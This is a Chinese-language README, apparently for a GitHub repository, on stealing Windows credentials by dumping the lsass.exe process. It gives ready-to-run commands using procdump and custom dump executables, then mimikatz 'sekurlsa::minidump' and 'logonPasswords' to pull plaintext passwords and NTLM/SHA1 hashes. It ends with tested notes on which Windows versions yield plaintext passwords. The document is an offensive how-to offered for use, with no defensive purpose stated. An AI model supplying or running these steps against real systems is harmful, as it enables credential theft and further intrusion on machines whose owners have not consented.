dump_lsass_for_Win7_x64.c 和 dump_lsass_for_Win10_x64.c 是国外一位大佬写的专门转储lsass.exe进程的工具
参考链接:https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/
procdump.exe 是微软官方的进程转储工具,设计初衷是抓取崩溃进程的内存数据
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
dump_lsass_for_Win7_x64.c 和 dump_lsass_for_Win10_x64.c有编译好的exe程序,GitHub下载:https://github.com/7hmA3s/dump_lsass
使用方法
第1步:dump内存数据
#使用prodump.exe转储(需要管理员权限)
procdump.exe -accepteula -ma lsass.exe lsass_dump
#或者使用dump_lsass_for_Win*_x64.exe转储(需要管理员权限)
dump_lsass_for_Win7_x64.exe
dump_lsass_for_Win10_x64.exe
第2步:利用mimikatz读取密码
#lsass_dump.dmp为保存dump数据的文件
mimikatz.exe "sekurlsa::minidump lsass_dump.dmp" "sekurlsa::logonPasswords full" exit
LM、NTLM和SHA1均是加密过的密码,Password是明文密码。
注意事项
在某些高版本的Windows中procdump.exe工具虽然能dump内存数据,但用mimikatz无法读取出明文密码,只能获取NTLM哈希和SHA1哈希,如:Windows 10.0.10586 x64
dump_lsass_for_Win7_x64.exe 和 dump_lsass_for_Win10_x64.exe 对Windows系统版本有一些限制,我简单测了一下:
dump_lsass_for_Win7_x64.exe 在以下平台可dump明文密码:
- Windows 7 x64
- Windows Server 2008 R2 SP1 x64
dump_lsass_for_Win7_x64.exe 在以下平台只dump出了NTLM哈希:
- Windows Server 2012 R2 标准版 x64 [6.3.9600]
dump_lsass_for_Win10_x64.exe 在以下平台可dump明文密码:
- Windows 10.0.10586 x64
dump_lsass_for_Win10_x64.exe 不能在以下平台运行,一运行程序就崩溃:
- Windows Server 2012 R2 标准版 x64 [6.3.9600]